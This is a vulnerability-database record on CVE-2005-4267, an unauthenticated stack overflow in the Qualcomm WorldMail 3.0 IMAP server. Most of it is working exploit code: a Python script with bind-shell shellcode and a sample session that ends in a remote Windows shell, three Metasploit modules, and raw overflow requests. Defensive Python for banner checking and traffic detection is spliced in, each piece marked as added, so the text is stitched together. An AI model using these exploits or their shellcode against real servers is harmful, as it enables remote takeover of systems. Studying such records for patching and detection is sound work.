CVE-2005-4267
CVSS 7.5
Published: 2005-12-21 06:03:00
Revised: 2011-03-07 00:00:00

[Original] Stack-based buffer overflow in Qualcomm WorldMail 3.0 allows remote attackers to execute arbitrary code via a long IMAP command that ends with a "}" character, as demonstrated using long (1) LIST, (2) LSUB, (3) SEARCH TEXT, (4) STATUS INBOX, (5) AUTHENTICATE, (6) FETCH, (7) SELECT, and (8) COPY commands.


[CNNVD] Qualcomm WorldMail IMAPD Remote Buffer Overflow Vulnerability (CNNVD-200512-511)

Qualcomm WorldMail is a mail and messaging server that supports IMAP, POP3, SMTP and webmail.
A buffer overflow vulnerability exists in the Qualcomm WorldMail IMAP Server; a remote attacker could exploit it to execute arbitrary instructions on the server. An unauthenticated remote attacker can send a long string ending with the "}" character, causing a stack overflow. The attacker could then use an SEH overwrite, or a standard EBP or EIP overwrite, to gain system privileges.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [exploitation requires no special access conditions]
Attack vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4267
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4267
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-511
(official data source) CNNVD

- Other links and resources

http://www.vupen.com/english/advisories/2005/3005
(VENDOR_ADVISORY)  VUPEN  ADV-2005-3005
http://www.securityfocus.com/bid/15980
(UNKNOWN)  BID  15980
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=359
(VENDOR_ADVISORY)  IDEFENSE  20051220 Qualcomm WorldMail IMAP Server String Literal Processing Overflow Vulnerability
http://securitytracker.com/id?1015391
(UNKNOWN)  SECTRACK  1015391
http://securityreason.com/securityalert/277
(UNKNOWN)  SREASON  277
http://secunia.com/advisories/17640
(VENDOR_ADVISORY)  SECUNIA  17640
http://seclists.org/lists/fulldisclosure/2005/Dec/1037.html
(VENDOR_ADVISORY)  FULLDISC  20051220 [ACSSEC-2005-11-27-0x1] Eudora Qualcomm WorldMail 3.0 IMAP4 Service 6.1.19.0

- Vulnerability information

Qualcomm WorldMail IMAPD Remote Buffer Overflow Vulnerability
High severity  Buffer overflow
2005-12-21 00:00:00 2007-01-24 00:00:00
Remote

- Advisories and patches

        

- Vulnerability information (1380)

Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit (EDBID:1380)
windows remote
2005-12-20 Verified
143 muts
#!/usr/bin/python
###################################################################################
#
# PRE AUTHENTICATION Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
#
# Coded by mati@see-security.com
#
# Details:
# * SEH gets overwritten at 970 bytes in the LIST command.
# * No space for shellcode, so 1st stage shellcode is used to
#   jump back 768 bytes into the bindshell (2nd stage) shellcode.
#
# Thanks:
# * My wife - for putting up with my obesssions
#                FOR EDUCATION PURPOSES ONLY!
###################################################################################
# root@muts:/tmp# ./test.py 192.168.1.162
#
# Eudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0 Overflow.
#
# Discovered by  Tim Shelton - security-advisories@acs-inc.com
# Coded by mati@see-security.com
#
# [+] Connecting
# [+] * OK  WorldMail IMAP4 Server 6.1.19.0 ready
# [+] Look Maa - No authentication!
# [+] Sending evil buffer...
# [+] Done
#
# [+] Connect to port 4444 on victim IP - Muhahaha!
#
# root@muts:/tmp# nc -vn 192.168.1.162 4444
# (UNKNOWN) [192.168.1.162] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\WINNT\system32>
#############################################################################

import sys
import struct
import socket
from time import sleep

def banner():
        print "\nEudora Qualcomm WorldMail 3.0 IMAPd Service 6.1.19.0Overflow.\n"
        print "Discovered by  Tim Shelton - security-advisories@acs-inc.com"
        print "Coded by mati@see-security.com\n"
 
if len(sys.argv)!=3:
        banner()
        print "Usage: eudora-imap-LIST.py <ip> <port>\n"
        sys.exit(0)
        
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Using Msf::Encoder::PexFnstenvMov with final size of 42 bytes
# First Stage Shellcode
sc3  ="\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
sc3 +="\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
sc3 +="\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
# Second Stage Shellcode
sc4  ="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
sc4 +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
sc4 +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
sc4 +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
sc4 +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
sc4 +="\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
sc4 +="\x4e\x36\x46\x32\x46\x52\x4b\x58\x45\x54\x4e\x53\x4b\x38\x4e\x37"
sc4 +="\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
sc4 +="\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"
sc4 +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"
sc4 +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
sc4 +="\x46\x4f\x4b\x33\x46\x35\x46\x52\x4a\x32\x45\x37\x45\x4e\x4b\x48"
sc4 +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34"
sc4 +="\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x38"
sc4 +="\x49\x48\x4e\x36\x46\x32\x4e\x41\x41\x36\x43\x4c\x41\x53\x4b\x4d"
sc4 +="\x46\x56\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x34\x4e\x50\x4b\x58"
sc4 +="\x42\x37\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x50\x55\x4a\x46"
sc4 +="\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
sc4 +="\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x53\x4a\x56\x47\x37\x43\x57"
sc4 +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
sc4 +="\x4e\x4f\x4b\x43\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e"
sc4 +="\x48\x36\x41\x38\x4d\x4e\x4a\x30\x44\x50\x45\x55\x4c\x36\x44\x30"
sc4 +="\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
sc4 +="\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x45\x43\x45\x43\x44"
sc4 +="\x43\x45\x43\x44\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x56\x41\x31"
sc4 +="\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x46\x46\x4a"
sc4 +="\x4c\x51\x42\x57\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x31"
sc4 +="\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
sc4 +="\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x45\x45\x35\x4f\x4f\x42\x4d"
sc4 +="\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x55\x4f\x4f\x48\x4d"
sc4 +="\x42\x35\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
sc4 +="\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
sc4 +="\x4f\x4f\x42\x4d\x48\x36\x4c\x56\x46\x36\x48\x46\x4a\x36\x43\x56"
sc4 +="\x4d\x56\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x35\x49\x32\x4e\x4c"
sc4 +="\x49\x38\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x33\x42\x4c"
sc4 +="\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x34\x4e\x32"
sc4 +="\x43\x59\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36"
sc4 +="\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
sc4 +="\x48\x4d\x4b\x55\x47\x55\x44\x55\x41\x55\x41\x45\x41\x35\x4c\x46"
sc4 +="\x41\x30\x41\x35\x41\x45\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
sc4 +="\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
sc4 +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f"
sc4 +="\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
sc4 +="\x4a\x46\x42\x4f\x4c\x58\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
sc4 +="\x4f\x4f\x42\x4d\x5a"

# Win2k SP4 JMP EBX - 0x77E1CCF7

buffer = '\x90'*61 + sc4+ "\xeb\x06\x06\xeb" + '\xf7\xcc\xe1\x77' + '\x90'*8 + sc3 + '}'*400
banner()
try:
	s.connect((sys.argv[1],int(sys.argv[2])))
except:
	print "Can\'t connect to server!\n"
	sys.exit(0)
print "[+] Connecting"
data=s.recv(1024)
print "[+] "+data.rstrip()
print "[+] Look Maa - No authentication!"
print "[+] Sending evil buffer..."
s.send('a001 LIST '+buffer+'\r\n')
s.close()
print "[+] Done\n"
print "[+] Connect to port 4444 on victim IP - Muhahaha!\n"

# milw0rm.com [2005-12-20]
		

- Vulnerability information (16474)

Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow (EDBID:16474)
windows remote
2010-07-01 Verified
0 metasploit
##
# $Id: eudora_list.rb 9653 2010-07-01 23:33:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Imap
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server
				version 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this
				particular vulnerability.

				NOTE: The service does NOT restart automatically by default. You may be limited to
				only one attempt, so choose wisely!
			},
			'Author'         => [ 'MC', 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9653 $',
			'References'     =>
				[
					[ 'CVE', '2005-4267'],
					[ 'OSVDB', '22097'],
					[ 'BID', '15980'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "\x00\x0a\x0d\x20\x7b",
					'StackAdustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
					[ 'WorldMail 3 Version 6.1.19.0',   { 'Ret' => 0x600b6317 } ], # p/p/r in MLstMgr.dll v6.1.19.0
					[ 'WorldMail 3 Version 6.1.20.0',   { 'Ret' => 0x10022187 } ], # p/p/r in msremote.dll ?
					[ 'WorldMail 3 Version 6.1.22.0',   { 'Ret' => 0x10022187 } ], # p/p/r in MsRemote.dll v6.1.22.0
				],
			'DisclosureDate' => 'Dec 20 2005',
			'DefaultTarget' => 0))
	end

	def check
		targ = auto_target
		disconnect

		return Exploit::CheckCode::Vulnerable if (targ)
		return Exploit::CheckCode::Safe
	end

	def auto_target
		connect

		if (banner and banner =~ /WorldMail/ and banner =~ /IMAP4 Server (.*) ready/)
			version = $1
			ver = version.split('.')
			if (ver.length == 4)
				major = ver[0].to_i
				minor = ver[1].to_i
				rev = ver[2].to_i
				build = ver[3].to_i
				if (major == 6 and minor == 1)
					return targets[1] if (rev == 19)
					return targets[2] if (rev == 20)
					return targets[3] if (rev == 22)
				end
			end
		end

		# no target found
		nil
	end

	def exploit
		if (target_index == 0)
			mytarget = auto_target
			if mytarget
				print_status("Automatically detected \"#{mytarget.name}\" ...")
			else
				raise RuntimeError, 'Unable to automatically detect a target'
			end
		else
			mytarget = target
			connect
		end

		jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
		jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
		jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

		sploit =  "a001 LIST " + rand_text_alphanumeric(20)
		sploit << payload.encoded
		sploit << generate_seh_record(mytarget.ret)
		sploit << make_nops(8) + jmp + rand_text_alphanumeric(40)
		sploit << "}" + "\r\n"

		sock.put(sploit)

		handler
		disconnect
	end

end
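The auto_target method above decides what to do by parsing the version string out of the server greeting. The following Python is the defender-side counterpart, added here and not part of the Metasploit module: it classifies a WorldMail greeting against build 6.1.22.1, which the module description names as the fixed version. FIXED_BUILD, the greeting regex, grab_banner and the sample greetings are this example's own assumptions.

```python
import re
import socket

# Build the Metasploit module description names as fixing this issue (assumed
# here as the cut-off; builds outside 6.1.19.0 to 6.1.22.0 were not covered).
FIXED_BUILD = (6, 1, 22, 1)

# Matches both greeting forms quoted in this record:
#   "* OK  WorldMail IMAP4 Server 6.1.19.0 ready"
#   "* OK WorldMail 3 IMAP4 Server 6.1.22.0 ready"
BANNER_RE = re.compile(r"WorldMail(?: 3)? IMAP4 Server (\d+(?:\.\d+){3}) ready")


def parse_build(banner):
    """Return the four-part build as a tuple of ints, or None if not a WorldMail greeting."""
    m = BANNER_RE.search(banner)
    if m is None:
        return None
    return tuple(int(part) for part in m.group(1).split("."))


def assess(banner):
    """Classify a greeting as 'not_worldmail', 'vulnerable' (below FIXED_BUILD) or 'fixed'."""
    build = parse_build(banner)
    if build is None:
        return "not_worldmail"
    return "vulnerable" if build < FIXED_BUILD else "fixed"


def grab_banner(host, port=143, timeout=5.0):
    """Read the greeting from a live server and log out; only needed for inventory checks."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        greeting = sock.recv(1024).decode("ascii", errors="replace").strip()
        sock.sendall(b"a001 LOGOUT\r\n")
    return greeting


# Constructed greetings with their expected classification, for an offline check
SAMPLES = {
    "* OK  WorldMail IMAP4 Server 6.1.19.0 ready": "vulnerable",
    "* OK WorldMail 3 IMAP4 Server 6.1.22.0 ready": "vulnerable",
    "* OK WorldMail 3 IMAP4 Server 6.1.22.1 ready": "fixed",
    "* OK Dovecot ready.": "not_worldmail",
}

if __name__ == "__main__":
    for greeting, expected in SAMPLES.items():
        print(f"{assess(greeting):14} {greeting}")
```

A greeting is only a hint: a build number below the cut-off says the host should be patched or checked, not that it is exploitable in its current configuration.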
		

- Vulnerability information (F83142)

Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow (PacketStormID:F83142)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,imap
windows
CVE-2005-4267

This Metasploit module exploits a stack overflow in the Qualcomm WorldMail IMAP Server version 3.0 (build version 6.1.22.0). Using the PAYLOAD of windows/shell_bind_tcp allows for the most reliable results.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in the Qualcomm WorldMail IMAP Server
				version 3.0 (build version 6.1.22.0). Using the PAYLOAD of windows/shell_bind_tcp
				allows for the most reliable results.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-4267'],
					[ 'OSVDB', '22097'],
					[ 'BID', '15980'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 750,
					'BadChars' => "\x00\x0a\x20\x0d\x7b", 
					'StackAdustment' => -3500,
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'WorldMail 3 Version 6.1.20',   { 'Ret' => 0x10022187 } ], # msremote.dll
				],
			'DisclosureDate' => 'Dec 20 2005',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect
		
		if (banner and banner =~ /WorldMail 3 IMAP4 Server 6.1.22.0 ready/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		jmp =  "\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28"
		jmp << "\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d"
		jmp << "\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b"

		sploit =  "a001 LIST " + rand_text_alpha_upper(20, payload_badchars) 
		sploit << payload.encoded + "\xeb\x06" + make_nops(2) + [target.ret].pack('V') 
		sploit << make_nops(8) + jmp + rand_text_alpha_upper(40, payload_badchars) 
		sploit << "}" + "\r\n"

		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- Vulnerability information (F43817)

eudora_imap.pm.txt (PacketStormID:F43817)
2006-02-14 00:00:00
y0  metasploit.com
exploit,overflow,imap
CVE-2005-4267

This Metasploit module exploits a stack overflow in the Qualcomm WorldMail IMAP Server version 3.0 (build version 6.1.22.0).

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::eudora_imap;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;

my $advanced = {
};

my $info = {
	'Name'    => 'Qualcomm WorldMail IMAPD Server Buffer Overflow',
	'Version' => '$Revision: 1.1 $',
	'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
	'Arch'    => [ 'x86' ],
	'OS'      => [ 'win32', 'win2000'],
	'Priv'    => 1,

	'UserOpts' =>
	{
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 143],
	},

	'AutoOpts' => { 'EXITFUNC' => 'process' },
	'Payload' =>
	{
		'Space'    => 750,
		'BadChars' => "\x00",
		'Prepend'  => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
	},

	'Encoder' =>
	{
		'Keys' => ['+alphanum'],
	},

	'Description' => Pex::Text::Freeform(qq{
		This module exploits a stack overflow in the Qualcomm WorldMail IMAP Server
		version 3.0 (build version 6.1.22.0).
	}),

	'Refs' =>
	[
		['CVE', '2005-4267'],
		['BID', '15980'],
	],

	'Targets' =>
	[
		['Windows 2000 Pro English ALL', 0x75022ac4],
	],

	'DefaultTarget' => 0,

	'Keys' => ['imap'],

	'DisclosureDate' => 'Dec 20 2005',
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);

	return($self);
}

sub Check {
	my ($self) = @_;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	);

	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	# The greeting carries the build number; a LOGOUT keeps the check harmless
	$s->Send("A023 LOGOUT\r\n");
	my $res = $s->Recv(-1, 20);
	$s->Close();

	if ($res !~ /WorldMail 3 IMAP4 Server 6\.1\.22\.0 ready/) {
		$self->PrintLine("[*] This server does not appear to be vulnerable.");
		return $self->CheckCode('Safe');
	}

	$self->PrintLine("[*] Vulnerable installation detected :-)");
	return $self->CheckCode('Detected');
}

sub Exploit {
	my $self = shift;
	my $targetHost = $self->GetVar('RHOST');
	my $targetPort = $self->GetVar('RPORT');
	my $targetIndex = $self->GetVar('TARGET');
	my $encodedPayload = $self->GetVar('EncodedPayload');
	my $shellcode = $encodedPayload->Payload;
	my $target = $self->Targets->[$targetIndex];

	my $sock = Msf::Socket::Tcp->new(
		'PeerAddr' => $targetHost,
		'PeerPort' => $targetPort,
	);

	if($sock->IsError) {
		$self->PrintLine('Error creating socket: ' . $sock->GetError);
		return;
	}

	my $resp = $sock->Recv(-1, 3);
	chomp($resp);
	$self->PrintLine('[*] Got Banner: ' . $resp);
	$resp = $sock->Recv(-1, 3);
	if($sock->IsError) {
		$self->PrintLine('Socket error: ' . $sock->GetError);
		return;
	}

	$self->PrintLine('[*] Sending overflow...');

	my $jmpback =
		"\x6a\x05\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x2f\x77\x28".
		"\x4b\x83\xeb\xfc\xe2\xf4\xf6\x99\xf1\x3f\x0b\x83\x71\xcb\xee\x7d".
		"\xb8\xb5\xe2\x89\xe5\xb5\xe2\x88\xc9\x4b";

	my $sploit =
		"a001 LIST ". $self->MakeNops(20). $shellcode.
		"\xeb\x06\x46\x92". pack('V', $target->[1]). $self->MakeNops(8).
		$jmpback. $self->MakeNops(40). "}". "\r\n";

	$sock->Send($sploit);

	$resp = $sock->Recv(-1, 3);
	if(length($resp)) {
		$self->PrintLine('[*] Got response, bad: ' . $resp);
	}

	$self->Handler($sock);
	$sock->Close();
	return;
}

1;
    

- Vulnerability information

22097
Eudora WorldMail Multiple IMAP Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public, Exploit Commercial Uncoordinated Disclosure

- Vulnerability description

A buffer overflow exists in WorldMail. The IMAP server fails to validate data passed to the LIST, LSUB, SEARCH TEXT, STATUS INBOX, AUTHENTICATE, FETCH, SELECT, and COPY commands resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2005-12-20 2005-11-27
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author

- Vulnerability information

Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
Boundary Condition Error 15980
Yes No
2005-12-20 12:00:00 2006-02-07 08:56:00
Tim Shelton is credited with the discovery of this vulnerability.

- Affected program versions

Qualcomm Eudora WorldMail Server 3.0

- Vulnerability discussion

WorldMail IMAPd service is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in finite-sized buffers.

An attacker can exploit this issue to crash the server resulting in a denial of service to legitimate users. Arbitrary code execution may also be possible; this may facilitate a compromise of the underlying system.

This issue is reported to affect IMAPd service version 6.1.19.0 of WorldMail 3.0; other versions may also be vulnerable.

- Exploit


The following proof of concept examples of IMAP requests are available:
'02 LIST ""' + '}'x 5000
'03 LSUB ""' + '}'x 32762
'04 SEARCH TEXT ' + '}'x32762
'05 STATUS INBOX ' + '}'x32764
'02 AUTHENTICATE ' + '}'x32768
'02 FETCH 2:4 ' + '}'x10000
'02 SELECT ' + '}'x10000
'02 COPY 2:4 ' + '}'x32765
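All eight proof-of-concept requests above share one shape: an affected command whose argument is abnormally long and ends in "}". The following Python, an added example that is not from SecurityFocus or any of the exploit authors, turns that shape into a detection check over IMAP client lines; the 512-byte threshold, the parser and the sample lines are this example's own assumptions. It also handles the edge case that an ordinary IMAP literal introducer such as APPEND INBOX {310} legitimately ends in "}".

```python
import re

# The eight IMAP commands the CVE-2005-4267 entry names as overflow vectors
AFFECTED_COMMANDS = {"LIST", "LSUB", "SEARCH", "STATUS",
                     "AUTHENTICATE", "FETCH", "SELECT", "COPY"}

# Assumed threshold: the public exploit overwrites SEH at 970 bytes in LIST and
# the proof-of-concept requests use 5000 to 32768 braces, so 512 leaves room
# for ordinary mailbox names and search criteria.
MAX_ARG_LEN = 512


def parse_command(line):
    """Split a client line into (tag, COMMAND, argument string); None if malformed."""
    parts = line.rstrip("\r\n").split(" ", 2)
    if len(parts) < 2 or not parts[0] or not parts[1]:
        return None
    args = parts[2] if len(parts) == 3 else ""
    return parts[0], parts[1].upper(), args


def check_line(line):
    """Return a finding dict for a suspicious line, or None.

    A legitimate literal introducer such as APPEND INBOX {310} also ends in
    '}', so the brace alone is not enough: the command must be one of the
    affected ones and the argument must be abnormally long.
    """
    parsed = parse_command(line)
    if parsed is None:
        return None
    tag, cmd, args = parsed
    if cmd not in AFFECTED_COMMANDS or not args.endswith("}"):
        return None
    if len(args) <= MAX_ARG_LEN:
        return None
    return {"tag": tag, "command": cmd, "arg_len": len(args),
            "trailing_braces": len(args) - len(args.rstrip("}"))}


def scan(lines):
    """Run check_line over an iterable of client lines and collect the findings."""
    return [f for f in map(check_line, lines) if f is not None]


# Constructed sample traffic: three ordinary client lines plus two lines in the
# shape of the proof-of-concept requests above.
SAMPLE_LINES = [
    'a001 LIST "" INBOX\r\n',
    "a002 APPEND INBOX {310}\r\n",
    "a003 SELECT INBOX\r\n",
    '02 LIST ""' + "}" * 5000 + "\r\n",
    "02 FETCH 2:4 " + "}" * 10000 + "\r\n",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)
```

The check runs on plaintext IMAP on port 143; traffic wrapped in TLS has to be decrypted at a proxy or inspected on the server side before lines can be fed to it.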

The following exploit code is available:

http://www.securityfocus.com/data/vulnerabilities/exploits/eudora_wmail.pl

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- References

 

 
